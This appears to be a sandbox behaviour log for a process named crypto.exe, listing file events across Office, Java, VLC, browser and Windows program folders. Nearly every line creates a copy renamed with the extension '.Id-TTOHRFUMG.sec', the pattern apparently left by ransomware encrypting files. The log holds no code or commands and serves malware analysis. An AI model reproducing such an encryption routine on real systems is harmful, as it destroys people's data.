File created	C:\Program Files\Microsoft Office\Office14\SLERROR.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\demux\libh26x_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\en-US\WMPMediaSharing.dll.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EST.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00625_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02417U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14515_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\button_right_mouseover.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Guayaquil.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\cronometer_s.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0283209.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD01074_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01301_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Panama.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02750U.BMP.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\OUTLOOK.DEV_COL.HXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\6.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-first-quarter_partly-cloudy.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\include\win32\jni_md.h.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Installer\setup.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\video_filter\libinvert_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\29.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\PDFFile_8.ico.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_rest.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Indian\Reunion.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105504.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\BREAK.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\cpyr.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200183.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18202_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Teal.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ERROR.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_zh_TW.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Eirunepe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\BabyBlue\HEADER.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsViewTemplate.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSHY7ES.LEX.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_up.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_win7.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\core_ja.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ExpenseReport.xltx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sl.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-image-mask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Earthy.css.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\dnsns.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200289.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02066_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\passport.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ko.pak.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.SF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYBB.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_en-GB.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Media Player\en-US\wmlaunch.exe.mui.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Newsprint.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185796.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsVersion1Warning.htm.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_choosecolor.gif.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OCRHC.DAT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\UnblockTest.bat.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_RGB_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif	crypto.exe
File created	C:\Program Files\Windows Defender\MpEvMsg.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\javafx-iio.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\play-static.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18225_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MEDIA\WHOOSH.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw120.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\Gadget_Main_Background_QuickLaunch.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00074_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler-common.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-charts.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\JoinFind.mpe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02567J.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00351_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0382957.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN092.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\stream_out\libstream_out_display_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AboutBox.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\37.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Godthab.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Rio_Gallegos.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0200151.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239079.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Origin.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\ClassicPhotoAlbum.potx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\default-browser-agent.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\dependentlibs.list.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\bin\jfr.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\POSTITS.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PROOF\MSGR3EN.LEX.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\XLICONS.EXE.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-print.xml_hidden.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\omni.ja.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-search.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02051_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293828.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\PicturesToolIconImages.jpg.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Africa\Tunis.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh87.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0235319.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_a52_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\system_settings.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MET.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\IN00919_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\OART.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\BRCH98SP.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBWIZ\LTHD11.POC.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-sampler.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\ext\sunmscapi.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00004_.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297757.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Trek.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\203x8subpicture.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\COMPUTER.ICO.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\vlm.html.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\EXPTOOWS.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WWINTL.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-progress-ui.xml.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Panel_Mask_PAL.wmv.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\wabmig.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\POWERPNT_F_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\spu\libsubsdelay_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME20.CSS.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Civic.thmx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\MAPIPH.DLL.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-left.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Lima.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105232.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\BrightOrange\TAB_OFF.GIF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\flyoutBack.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\userContent_16x9_imagemask.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\Xlate_Init.xsn.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\SHOT.WAV.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Warsaw.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_zh_4.4.0.v20140623020002.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099185.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB11.BDR.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\codec\libcvdsub_plugin.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_single_orange.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\js\settings.js.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\day-of-week-16.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\America\Argentina\Ushuaia.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01160_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0103058.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\SCHDRESP.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGMN111.XML.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Mozilla Firefox\api-ms-win-core-synch-l1-2-0.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\circle_glass_Thumbnail.bmp.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\vlc.mo.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\bin\jstat.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\WZCNFLCT.CHM.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\calendar_double.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_da.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Windows Mail\WinMail.exe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\1047x576black.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\zi\Asia\Aqtobe.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Equity.eftx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\INFOPATHEDITOR_K_COL.HXK.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00096_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0086428.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_justify.gif.Id-TTOHRFUMG.sec	crypto.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H	crypto.exe
File created	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\9.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jre7\lib\jfxrt.jar.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152894.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Manuscript.dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\FORMS\1033\TASKUPD.CFG.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Templates\1033\OrielReport.Dotx.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Explorer.zip.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00305_.WMF.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Microsoft Office\Office14\ContactPicker.dll.Id-TTOHRFUMG.sec	crypto.exe
File created	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\3.png.Id-TTOHRFUMG.sec	crypto.exe
